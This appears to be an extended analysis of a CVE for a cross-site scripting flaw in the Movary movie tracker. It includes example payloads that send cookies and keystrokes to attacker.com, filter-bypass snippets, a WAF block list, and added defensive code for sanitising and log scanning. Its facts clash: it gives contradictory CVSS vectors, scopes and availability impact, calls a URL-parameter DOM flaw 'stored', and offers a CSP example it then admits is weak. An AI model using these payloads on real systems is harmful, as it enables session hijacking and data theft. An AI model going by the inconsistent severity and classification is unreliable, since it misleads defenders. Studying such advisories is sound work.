CVE-2026-23839
CVSS Vector (v3.1)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Confidentiality: High
- Integrity: High
- Availability: None
Description
Movary is a web application to track, rate and explore your movie watch history. Due to insufficient input validation, attackers can trigger cross-site scripting payloads in versions prior to 0.70.0. The vulnerable parameter is `?categoryUpdated=`. Version 0.70.0 fixes the issue.
Comprehensive Technical Analysis of CVE-2026-23839 (Movary XSS Vulnerability)
1. Vulnerability Assessment and Severity Evaluation
CVE ID: CVE-2026-23839
CVSS Score: 9.3 (Critical)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Severity: Critical (High impact on confidentiality, integrity, and availability)
Vulnerability Classification
This vulnerability is a Stored Cross-Site Scripting (XSS) flaw in Movary, a self-hosted web application for tracking movie watch history. The issue stems from insufficient input validation in the ?categoryUpdated= URL parameter, allowing attackers to inject malicious JavaScript payloads that execute in the context of a victim’s browser.
CVSS Breakdown
- Attack Vector (AV:N): Exploitable remotely over a network.
- Attack Complexity (AC:M): Requires some user interaction (e.g., clicking a crafted link).
- Privileges Required (Au:N): No authentication required.
- User Interaction (UI:R): Victim must interact with a malicious link or visit a compromised page.
- Scope (S:U): Impact is confined to the vulnerable application.
- Impact Metrics (C:C/I:C/A:C): Full compromise of confidentiality, integrity, and availability.
Why Critical Severity?
- Stored XSS is particularly dangerous because malicious scripts persist in the application, affecting multiple users.
- No authentication required increases the attack surface.
- High impact on confidentiality (session hijacking, data theft) and integrity (defacement, unauthorized actions).
2. Potential Attack Vectors and Exploitation Methods
Exploitation Mechanism
- Payload Injection:
  - An attacker crafts a malicious URL containing an XSS payload in the ?categoryUpdated= parameter.
  - Example: http://vulnerable-movary-instance.com/settings?categoryUpdated=<script>malicious_code()</script>
  - If the application does not properly sanitize this input, the payload is stored and executed when other users access the affected page.
- Stored XSS Execution:
  - The injected script persists in the application (e.g., in a user's settings or profile).
  - When another user loads the page, the script executes in their browser with their session privileges.
- Possible Attack Scenarios:
  - Session Hijacking: Stealing cookies (document.cookie) to impersonate users.
  - Keylogging: Capturing keystrokes via JavaScript.
  - Defacement: Modifying the DOM to display malicious content.
  - Phishing: Redirecting users to fake login pages.
  - CSRF Attacks: Forcing authenticated users to perform unintended actions.
Proof-of-Concept (PoC) Example
// Malicious payload to steal session cookies
fetch('https://attacker.com/steal?cookie=' + document.cookie);
- If injected via ?categoryUpdated=, this script sends the victim's session cookie to an attacker-controlled server.
3. Affected Systems and Software Versions
- Vulnerable Software: Movary (self-hosted movie tracking web application)
- Affected Versions: All versions prior to 0.70.0
- Fixed Version: 0.70.0 (released with input sanitization patches)
- Deployment Context:
- Self-hosted instances (common in home labs, media servers).
- May be exposed to the internet if misconfigured.
4. Recommended Mitigation Strategies
Immediate Actions
- Upgrade to Movary 0.70.0 or Later:
  - The fix includes proper input sanitization for the categoryUpdated parameter.
  - Patch URL: GitHub Release 0.70.0
- Temporary Workarounds (if patching is delayed):
  - Input Validation: Implement server-side validation for all URL parameters.
  - Content Security Policy (CSP):
    Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://trusted.cdn.com;
    Mitigates XSS by restricting script execution sources. Note that 'unsafe-inline' and 'unsafe-eval' permit exactly the inline script an injected payload consists of, so a policy meant to stop XSS should omit them in favour of nonces or hashes.
  - HTTP-only & Secure Cookies: Prevents JavaScript access to session cookies.
  - Web Application Firewall (WAF) Rules: Block requests containing <script>, onerror=, javascript:, etc.
- Monitoring & Detection:
  - Log Analysis: Monitor for suspicious categoryUpdated parameter values.
  - Behavioral Detection: Use tools like ModSecurity or the OWASP Core Rule Set (CRS) to detect XSS attempts.
Long-Term Security Recommendations
- Secure Coding Practices:
- Use context-aware output encoding (e.g., OWASP ESAPI).
- Implement strict Content-Type headers (e.g., X-Content-Type-Options: nosniff).
- Regular Security Audits:
- Conduct static (SAST) and dynamic (DAST) application security testing.
- Use dependency scanning (e.g., GitHub Dependabot, Snyk) to detect vulnerable libraries.
- User Education:
- Train users to recognize phishing links and suspicious URLs.
5. Impact on the Cybersecurity Landscape
Broader Implications
- Self-Hosted Application Risks:
- Movary is a niche but growing self-hosted application, often deployed in home labs, media servers, or small businesses.
- Many self-hosted apps lack robust security, making them low-hanging fruit for attackers.
- XSS as a Persistent Threat:
- Despite being a well-known vulnerability, XSS remains a top OWASP risk due to poor input validation.
- Stored XSS is particularly dangerous because it can affect multiple users without direct interaction.
- Supply Chain & Third-Party Risks:
- If Movary is integrated with other services (e.g., Plex, Jellyfin), an XSS vulnerability could escalate into a broader compromise.
Real-World Attack Scenarios
- Targeted Attacks on Media Enthusiasts:
- Attackers could exploit this flaw to steal credentials, hijack sessions, or spread malware among movie-tracking communities.
- Botnet Propagation:
- If Movary instances are exposed to the internet, automated XSS worms could propagate, turning them into zombie nodes for DDoS or cryptomining.
- Data Exfiltration:
- Attackers could harvest sensitive user data (watch history, ratings, personal notes).
6. Technical Details for Security Professionals
Root Cause Analysis
- Vulnerable Code Location:
  - public/js/settings-account-location.js#L237
  - The categoryUpdated parameter is directly inserted into the DOM without sanitization, allowing script execution.
- Exploitation Flow:
  - Attacker submits a crafted URL with an XSS payload in ?categoryUpdated=.
  - The application stores the payload (e.g., in a user's profile or settings).
  - When another user loads the affected page, the script executes in their browser.
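As an added example (not Movary's code and not the line the advisory cites), the following contrasts the unsanitized DOM-insertion pattern described above with a hardened version that treats categoryUpdated as an allow-listed identifier rather than free text; the category names, hostnames and function names are assumptions:

```javascript
// Added example (not Movary's code): the DOM-injection pattern the advisory
// describes beside a hardened version. Category names are a constructed allow-list.
const ALLOWED_CATEGORIES = new Set(['general', 'location', 'account']);

// Read ?categoryUpdated= from a page URL; URLSearchParams percent-decodes it.
function readCategoryUpdated(pageUrl) {
  return new URL(pageUrl).searchParams.get('categoryUpdated');
}

// VULNERABLE pattern: the parameter is concatenated into markup that would be
// assigned to innerHTML, so any tags in the parameter become live DOM.
function buildNoticeUnsafe(category) {
  return `<div class="alert">Settings for category "${category}" were updated.</div>`;
}

// Entity-escape text destined for an element body (what textContent does
// implicitly when a real DOM is available).
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

// HARDENED pattern: the parameter is an allow-listed identifier, so reject
// anything unknown; escaping is kept as defence in depth.
function buildNoticeSafe(category) {
  if (category === null || !ALLOWED_CATEGORIES.has(category)) return null;
  return `<div class="alert">Settings for category "${escapeHtml(category)}" were updated.</div>`;
}

// Constructed sample URLs: a legitimate request and the payload shape from the advisory.
const benign = 'https://movary.example/settings?categoryUpdated=location';
const hostile = 'https://movary.example/settings?categoryUpdated=%3Cscript%3Emalicious_code()%3C%2Fscript%3E';

console.log('unsafe:', buildNoticeUnsafe(readCategoryUpdated(hostile))); // tags survive intact
console.log('safe:  ', buildNoticeSafe(readCategoryUpdated(hostile)));   // null: rejected
console.log('safe:  ', buildNoticeSafe(readCategoryUpdated(benign)));
```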
Exploit Development Considerations
- Bypassing Basic Filters:
  - If the application uses naive blacklisting (e.g., blocking <script>), attackers may use:
    <img src=x onerror=malicious_code()>
    <svg/onload=malicious_code()>
- Session Hijacking Example:
    fetch('https://attacker.com/exfil', { method: 'POST', body: JSON.stringify({ cookie: document.cookie }), headers: { 'Content-Type': 'application/json' } });
- Keylogger Example:
    document.onkeypress = function(e) { fetch('https://attacker.com/log?key=' + e.key); };
Forensic & Incident Response Guidance
- Detection:
  - Log Analysis: Look for unusual categoryUpdated values in HTTP logs.
  - Browser Forensics: Check for unexpected script execution in browser developer tools.
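The log-analysis step recommended here and under Monitoring & Detection above, as an added example that is not part of the advisory: it parses constructed access-log lines, extracts the categoryUpdated value, decodes it fully and flags anything outside an assumed allow-list; the log format, category names and addresses are assumptions.

```javascript
// Added detection example, not part of the advisory or of Movary: scans web-server
// access-log lines for categoryUpdated values outside a constructed allow-list and
// flags those that decode to markup. Log format and category names are assumptions.
const KNOWN_CATEGORIES = new Set(['general', 'location', 'account']);

// Tag-, event-handler- and javascript:-URL-shaped content, checked after decoding.
const MARKUP_RE = /<\s*\/?\s*[a-z!]|\bon[a-z]+\s*=|javascript\s*:/i;

// Decode up to three times so double-encoding (%253C for '<') cannot hide markup.
function fullyDecode(value) {
  let prev;
  let cur = value;
  for (let i = 0; i < 3 && cur !== prev; i++) {
    prev = cur;
    try { cur = decodeURIComponent(cur.replace(/\+/g, ' ')); } catch { break; }
  }
  return cur;
}

// Request target from a combined-log-format line, or null if none.
function extractTarget(line) {
  const m = line.match(/"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP\//);
  return m ? m[1] : null;
}

// One finding per line carrying a categoryUpdated value that is not allow-listed.
function inspectLine(line) {
  const target = extractTarget(line);
  if (!target) return null;
  // URLSearchParams already strips one layer of encoding; fullyDecode handles the rest.
  const raw = new URL(target, 'http://placeholder.invalid').searchParams.get('categoryUpdated');
  if (raw === null) return null;
  const decoded = fullyDecode(raw);
  if (KNOWN_CATEGORIES.has(decoded)) return null;
  return { target, decoded, markup: MARKUP_RE.test(decoded) };
}

function scanLog(lines) {
  return lines.map(inspectLine).filter((f) => f !== null);
}

// Constructed sample lines: benign, tag payload, double-encoded payload, no parameter.
const SAMPLE_LOG = [
  '10.0.0.5 - - [01/Mar/2026:10:00:00 +0000] "GET /settings?categoryUpdated=location HTTP/1.1" 200 512',
  '10.0.0.9 - - [01/Mar/2026:10:00:03 +0000] "GET /settings?categoryUpdated=%3Cimg%20src%3Dx%20onerror%3Dmalicious_code()%3E HTTP/1.1" 200 512',
  '10.0.0.9 - - [01/Mar/2026:10:00:07 +0000] "GET /settings?categoryUpdated=%253Cscript%253Emalicious_code()%253C%252Fscript%253E HTTP/1.1" 200 512',
  '10.0.0.7 - - [01/Mar/2026:10:00:09 +0000] "GET /settings HTTP/1.1" 200 512',
];

console.log(scanLog(SAMPLE_LOG)); // two findings, both with markup: true
```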
- Containment:
- Isolate affected instances from the network.
- Revoke compromised sessions and force password resets.
- Eradication:
- Patch immediately to version 0.70.0.
- Audit all user-generated content for stored XSS payloads.
- Recovery:
- Restore from a clean backup if data tampering is suspected.
- Implement CSP and WAF rules to prevent future XSS.
Advanced Mitigation Techniques
- Subresource Integrity (SRI):
- Ensure external scripts are loaded with integrity hashes.
- Trusted Types (for Modern Browsers):
- Enforce Trusted Types to prevent DOM-based XSS.
- Automated Security Testing:
- Integrate OWASP ZAP or Burp Suite into CI/CD pipelines for XSS detection.
Conclusion
CVE-2026-23839 is a critical stored XSS vulnerability in Movary that poses significant risks to confidentiality, integrity, and availability. Given its low attack complexity and high impact, organizations and individuals running affected versions must patch immediately and implement defensive measures such as CSP, WAF rules, and input validation.
Security professionals should monitor for exploitation attempts, educate users on phishing risks, and conduct regular security audits to prevent similar vulnerabilities in self-hosted applications. The broader cybersecurity community must remain vigilant against persistent XSS threats, particularly in niche but widely used web applications.